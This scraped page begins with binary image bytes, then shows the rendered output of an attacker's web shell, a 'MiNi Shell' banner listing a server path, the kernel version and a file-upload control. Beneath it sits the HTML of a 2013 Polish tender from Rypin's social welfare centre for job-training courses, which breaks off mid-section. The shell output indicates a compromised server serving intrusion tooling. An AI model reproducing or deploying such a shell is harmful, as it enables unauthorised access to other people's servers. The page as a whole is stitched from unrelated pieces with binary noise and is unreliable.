JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130521/197674-N-2013.html

<p class="kh_header"><b>Rypin: Usługi szkoleniowe dla beneficjentów projektu systemowego Aktywna integracja w gminie Rypin</b><br>
<b>Numer ogłoszenia: 197674 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Lipnowska 4, 87-500 Rypin, woj. kujawsko-pomorskie, tel. 54 280 97 00, faks 54 280 21 37.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.rypin.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> NIE DOTYCZY</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla beneficjentów projektu systemowego Aktywna integracja w gminie Rypin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Dla 19 osób, z którymi zawarto kontrakty socjalne:
1.Szkolenie: Trening kompetencji społecznych: 19 osób, 18 godz., w okresie czerwiec-lipiec 2013r.,  realizacja szkolenia na terenie miasta Rypin,  zakres programu szkolenia: poczucie wartości-godności, budowanie postawy asertywnej, Moje prawa, Obrona swoich praw w sytuacjach społecznych, Monolog wewnętrzny, myśli utrudniające podejmowanie aktywności. 2.Indywidualne spotkania z psychologiem: 19 osób, 57 godz. łącznie, w tym 3 godz. na 1 uczestnika, w okresie czerwiec-wrzesień 2013r., realizacja spotkań na terenie miasta Rypin 3.Szkolenie: Warsztaty z doradcą zawodowym:19 osób, 18 godz.,  w okresie czerwiec-lipiec 2013r., realizacja szkolenia na terenie miasta Rypin, zakres programu szkolenia: autoprezentacja-sztuka mówienia o sobie; bilans umiejętności zawodowych; dokumenty aplikacyjne i rozmowa kwalifikacyjna; komunikacja; przedsiębiorczość. 4. Kurs Opiekunka osób starszych, chorych i niepełnosprawnych, 4 osoby, 120  godz., w okresie sierpień-październik 2013r., realizacja części teoretycznej i praktycznej kursu na  terenie miasta Rypin, zakres programu kursu: Podstawowe aspekty psychologiczno-pedagogiczne opieki nad osobami starszymi, chorymi, niepełnosprawnymi; Podstawy anatomii i fizjologii  człowieka; Gerontologia; Pielęgnacja i higiena osoby starszej, chorej i  niepełnosprawnej; Zasady udzielania pomocy przedmedycznej, Podstawowe zagadnienia z zakresu bezpieczeństwa i higieny pracy opiekunek; zajęcia praktyczne, egzamin. 5.Kurs Podstawy kosmetyki, stylizacja paznokci i wizaż, 2 osoby, 80 godz., w okresie lipiec - październik 2013r., realizacja kursu na terenie miasta Rypin, zakres programu kursu- zakres programu kursu: pielęgnacja kończyn górnych, pielęgnacja kończyn dolnych, pielęgnacja oczu i ich oprawy w warunkach gabinetowych i domowych; pielęgnacja skóry, twarzy, szyi i dekoltu; zabiegi pielęgnacja skóry twarzy, szyi i dekoltu, zabiegi pielęgnacyjne twarzy z wykorzystaniem  peelingu oraz masek kosmetycznych; ochrona skóry w zależności od pory roku; makijaż jako sztuka upiększania twarzy, manicure i pedicure kosmetyczny, stylizacja i przedłużanie paznokci (metoda akrylowa i żelem UV), żel i akryl na stopach (przedłużanie/utwardzanie płytki naturalnej), wzornictwo podstawowe (lakiery, aplikacje ozdób, zdobienie przy użyciu pędzelków). 6. Kurs Kucharz  małej  gastronomii, 5 osób,  120 godz., w okresie sierpień - listopad 2013 r., realizacja kursu na terenie miasta Rypin. 7. Kurs Szwaczka, 1 osoba, 122 godz., w okresie lipiec-październik 2013 r., realizacja kursu na terenie miasta Rypin, zakres programu kursu  Zasady żywienia; Technologia gastronomiczna; Towaroznawstwo spożywcze; Wyposażenie techniczne, Podstawy BHP, egzamin.8. Kurs Bukieciarstwo i florystyka, 1 osoba, 80 godz., w okresie sierpień-listopad 2013r., realizacja kursu na terenie miasta Rypin, zakres programu kursu: materiały florystyczne: narzędzia, druty (grubość i przeznaczenie), taśmy, kleje, wstążki, gąbki, florety, mikrofony, siatki, fizeliny, ratan, rafie i inne; florystyka zawód twórczy; kwiaty doniczkowe i cięte (nazwy, gatunki, pielęgnacja, przechowywanie, przedłużanie trwałości, pakowanie, zakup); dekoracja kwiatów doniczkowych (przygotowanie roślin, omówienie gatunków i wymagań, zabezpieczenie przed przesiąkaniem wody, dekoracja materiałem - siatka, fizelina, aranżacja w koszach i naczyniach, nasadzenia); dekoracja pojedynczego kwiatu (przygotowanie kwiatów i zieleni, podcinanie końcówek, skośne cięcie nożem, wyznaczanie miejsca wiązania, dobór elementów dekoracji, wykonanie dekoracji: rożek i naczynie); bukiety na każdą okazję (przygotowanie roślin i zieleni, dobór bukietu do okoliczności i osoby, bukiet okrągły-spirala, bukiet tzw. ściana, bukiet prosty, bukiet okrągły, bukiet wystopniowany, bukiet para-el, spiralne ułożenie łodyg); florystyka żałobna-bukiet (pielęgnacja roślin, bukiet okragły, bukiet tzw. ściana, kokardy i szarfy-formy i kształty bukietów); florystyka żałobna - floret (pielęgnacja roślin, floret okrągły, floret łezka, dekoracja grobów - kompozycje, nasadzenia, dobór kwiatów);  florystyka  ślubna-Bidermeier (przygotowanie i pielęgnacja roślin, dobór wiązanki do osoby, dobór kwiatów-trwałość, wykonanie wiązanki zwartej okrągłej, wykonanie wiązanki Bidermeier-odmiany); florystyka ślubna-mikrofon (przygotowanie roślin, wykonanie kryzy, umocowanie mikrofonu, rożek, bukiet do ślubu na kryzie, bukiet do ślubu-mikrofon: mały, średni, spływający, florystyka ślubna-pielęgnacja kwiatów, wiązanka spływająca (drutowanie, owijanie, watowanie, rączka), wiązanka spływająca z naturalnych łodyg. 9. Kurs Prawo jazdy kat. B, 4 osoby, 60 godz.,  termin kursu: lipiec - grudzień 2013 r.,  realizacja kursu:  zajęcia teoretyczne - na terenie miasta Rypin, zajęcia praktyczne- na terenie miasta Rypin oraz powiat rypiński, powiat lipnowski  i powiat włocławski, zakres programu kursu zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz. 1834, zm. Dz. U. z 2006r. Nr 3 poz. 24, z późn. zmianami. 10. Kurs Kierowca-operator wózków jezdniowych z napędem silnikowym, 1 osoba, 67 godz, w okresie sierpień- listopad 2013r.,  realizacja części teoretycznej i praktycznej kursu na terenie miasta Rypin. 11.kurs Palacz kotłów c.o., 1 osoba, 35 godz.  w okresie sierpień-listopad 2013r., realizacja części teoretycznej i praktycznej kursu na terenie miasta Rypin. II. Dla 8 osób, z którymi zawarto umowy o udzielenie wsparcia w ramach Programu Aktywności Lokalnej: 1.Warsztaty umiejętności wychowawczych, 8 osób, 24 godz., w okresie lipiec sierpień 2013r., realizacja szkolenia na terenie miasta Rypin, zakres programu szkolenia: praca nad  zbliżeniem się do lepszego rozumienia dziecka, podstawowe zagadnienia związane z sytuacją psychologiczną relacji dziecko-rodzic, Dobry rodzic-wspierający rodzic, Jak dobrze wychowywać?, praca nad rozwiązywaniem sytuacji trudnych, stawianie granic, praca nad zaspakajaniem potrzeb-zachcianek dziecka, obowiązki i przyjemności. 2. Szkolenie: Warsztaty motywacyjne i zarządzania budżetem domowymi: 8 osób, 18 godz.,  w okresie lipiec sierpień 2013r., realizacja szkolenia na terenie miasta Rypin, - zakres programu szkolenia: długotrwałe bezrobocie i jego skutki (jak je zrozumieć), umiejętności psychospołeczne osoby bezrobotnej (wyuczenie i wzmocnienie), postawa lękowa, bezradna, pasywna i roszczeniowa (jak ją przełamać), poczucia wartości-godności osoby bezrobotnej (jak je wzmocnić), zasoby psychologiczne osoby bezrobotnej (jak je wzmocnić); planowanie i monitorowanie potrzeb, planowanie i bilansowanie budżetu rodziny, efektywne sposoby oszczędzania na wydatkach domowych, jak ograniczyć wydatki niekonieczne, gospodarowanie niewielkimi środkami pieniężnymi, jak radzić sobie w trudnych sytuacjach finansowych. 3. Indywidualne spotkania z psychologiem: 8 osób, 24 godz. łącznie, w tym 3 godz. na 1 uczestnika, w okresie lipiec-wrzesień 2013r., realizacja spotkań na terenie miasta Rypin. 4. Szkolenie Warsztaty gotowania, 8 osób, 80 godz., w okresie sierpień-listopad 2013r., realizacja warsztatów na terenie miasta Rypin, zakres programu warsztatów: Zasady żywienia, BHP w małej gastronomii i gospodarstwie domowym, składanie serwetek, ustawianie stołów, podstawowe i rozszerzone nakrycia, obróbka wstępna i cieplna surowców, sposoby dekorowania i podawania potraw, charakterystyka i zastosowanie w produkcji kulinarnej warzyw, ziemniaków, grzybów i owoców, przygotowanie zup, potraw mięsnych (wieprzowe, wołowe, drobiowe), potraw mącznych, potraw rybnych, sałatek, surówek, deserów, pieczenie ciast..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość przeprowadzenia zamówień uzupełniających do 50 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 70.22.00.00-9, 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał tj. zrealizował i zakończył co najmniej 6 kompleksowych usług szkoleniowych w zakresie zgodnym lub zbliżonym z opisem przedmiotu zamówienia (potwierdzone dokumentami, że usługi te zostały wykonane należycie), przy czym wartość każdej ze wskazanych w wykazie usług winna wynosić nie mniej niż 50.000,00 złotych brutto.
Przez kompleksowe usługi Zamawiający rozumie wykonanie usługi dla jednego podmiotu obejmującej co najmniej warsztaty/szkolenia motywacyjne (z psychologiem i doradcą zawodowym) oraz kursy zawodowe.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej jedną osobą, która posiada odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie w dziedzinie, z której prowadzi zajęcia (dotyczy każdego kursu oddzielnie zgodnie z opisem przedmiotu zamówienia) oraz przeprowadziła co najmniej trzy kursy i-lub szkolenia z zakresu-tematyki odpowiadającej zajęciom-tematyce danego kursu-szkolenia (zgodnie z opisem przedmiotu zamówienia) w okresie ostatnich trzech lat przed upływem terminu składania ofert, zgodnie z wymaganiami wskazanymi w Załączniku nr 1 do niniejszej SIWZ: dla szkoleń Trening kompetencji społecznych, Indywidualne spotkania z psychologiem, Warsztaty umiejętności wychowawczych, Warsztaty motywacyjne i zarządzania budżetem domowym dysponuje co najmniej jedną osobą, która posiada: wykształcenie wyższe, uprawnienia psychologa, psychoterapeuty i trenera warsztatu psychologicznego, członkostwo w  Polskim Towarzystwie Psychologicznym, aktualne zaświadczenie potwierdzające poddawanie swojej pracy superwizji (tj. konsultowanie metod pracy i obowiązków wynikających z jej charakteru z innym specjalistą posiadającym certyfikat superwizora) wystawionego nie później niż 3 mce przed upływem terminu składania ofert, min. 3letnie doświadczenie w przeprowadzeniu ww. szkoleń, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym; dla szkolenia Warsztaty z doradcą zawodowym dysponuje co najmniej jedną osobą, która posiada: wykształcenie wyższe kierunkowe, licencję doradcy zawodowego I stopnia, min. 3letnie doświadczenie w przeprowadzeniu ww. szkolenia, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym; dla kursu Opiekunka osób starszych, chorych  i niepełnosprawnych dysponuje co najmniej jedną osobą, która posiada: wykształcenie wyższe o kierunku medycznym i przygotowanie pedagogiczne, min. 3letnie doświadczenie w przeprowadzeniu ww. kursu, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym, min.  3letnie doświadczenie w pracy zawodowej zgodnej z przedmiotem zamówienia; dla kursu Podstawy kosmetyki, stylizacja paznokci i wizaż dysponuje co najmniej jedną osobą, która posiada: wykształcenie wyższe lub średnie z zakresu kosmetologii lub tytuł zawodowy, uprawnienia pedagogiczne i min. 3letnie doświadczenie w pracy na stanowisku kosmetyczki, stylistki paznokci oraz wizażu, min. 3letnie doświadczenie w przeprowadzeniu ww. kursu, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym; dla kursu Kucharz małej gastronomii oraz szkolenia Warsztaty gotowania dysponuje co najmniej jedną osobą, która posiada: wykształcenie co najmniej średnie kierunkowe, przygotowanie pedagogiczne, min. 3letnie doświadczenie w przeprowadzeniu ww. kursu, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym, min. 3- letnie doświadczenie w pracy zawodowej związanej z przedmiotem zamówienia; dla kursu Szwaczka dysponuje co najmniej jedną osobą, która posiada: wykształcenie średnie odzieżowe, przygotowanie pedagogiczne, min. 3letnie doświadczenie w przeprowadzeniu ww. kursu, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym; dla kursu Bukieciarstwo i florystyka dysponuje co najmniej jedną osobą, która posiada: wykształcenie co najmniej średnie kierunkowe, przygotowanie pedagogiczne, min. 3letnie doświadczenie w przeprowadzeniu ww. kursu, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym, min.3letnie doświadczenie w pracy zawodowej związanej z przedmiotem zamówienia;. dla kursu Prawo jazdy kat. B dysponuje co najmniej jedną osobą, która posiada: od min. 3 lat czynne kwalifikacje instruktorskie nauki (Państwowy Egzamin Instruktorski) w zakresie kursu prawa jazdy kat. B, min. 3letnie doświadczenie w realizacji ww. kursu; dla kursu Kierowca-operator wózków jezdniowych z napędem silnikowym dysponuje co najmniej jedną osobą, która posiada: imienny certyfikat w zakresie metodyki prowadzenia nauki jazdy i teorii na kursach dla kierowców wózków jezdniowych wydany przez ODK w Mysłowicach lub Urząd Dozoru Technicznego, osoba wskazana do prowadzenia zajęć z zakresu bezpiecznej obsługi-wymiany butli gazowych w wózkach jezdniowych powinna dodatkowo posiadać zaświadczenie imienne w zakresie szkolenia teoretycznego i praktycznego wymiany butli gazowych w wózkach jezdniowych wydane przez ODK w Mysłowicach lub Urząd Dozoru Technicznego, min. 3letnie doświadczenie w przeprowadzeniu ww. kursu, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym; dla kursu Palacz kotłów c.o. dysponuje co najmniej jedną osobą, która posiada: wykształcenia minimum średnie związane z przedmiotem zamówienia oraz uprawnienia pedagogiczne bądź ukończony kurs pedagogiczny dla instruktorów praktycznej nauki zawodu, min. 3letnie doświadczenie w przeprowadzeniu ww. kursu, w tym dla dorosłych osób bezrobotnych zagrożonych wykluczeniem społecznym</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że posiada opłaconą polisę, 
a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 200.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 25</li>
<li>2 - Doświadcz Wykonawc w realizac indywid spotkań z psycholog, trening komp społ,  warsztat motywacyj i zarząd. budż dom, warszta. umiejętności wyc - 5</li>
<li>3 - Doświadczenie Wykonawcy w realizacji warszttaów z doradcą zawodowym - 5</li>
<li>4 - Doświadczenie Wykonawcy w realizacji kursu Kucharz małej gastronomii oraz warsztatów gotowania - 5</li>
<li>5 - Doświadczenie Wykonawcy w realizacji kursu Palacz c.o. - 5</li>
<li>6 - Doświadczenie Wykonawcy w realizacji kursu Podstawy kosmetyki, stylizacja paznokci i wizaż - 5</li>
<li>7 - Doświadczenie Wykonawcy w realizacji kursu Kierowca - operator wózków jezdniowych z napędem silnikowym - 5</li>
<li>8 - Doświadczenie Wykonawcy w realizacji kursu Szwaczka - 5</li>
<li>9 - Doświadczenie Wykonawcy w realizacji kursu Florystka - 5</li>
<li>10 - Doświadczenie Wykonawcy w realizacji kursu Prawo jazdy kat. B - 5</li>
<li>11 - Doświadczenie Wykonawcy w realizacji kursu Opiekun osoby starszej, chorej i niepełnosprawnej - 5</li>
<li>12 - Ilość wykonanych szkoleń - 25</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany postanowień umowy (zgodnie z art. 144 ustawy Pzp) w przypadkach, gdy:
a) nastąpi zmiana przepisów wpływających na realizację przedmiotu zamówienia,
b) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowane jest zamówienie;
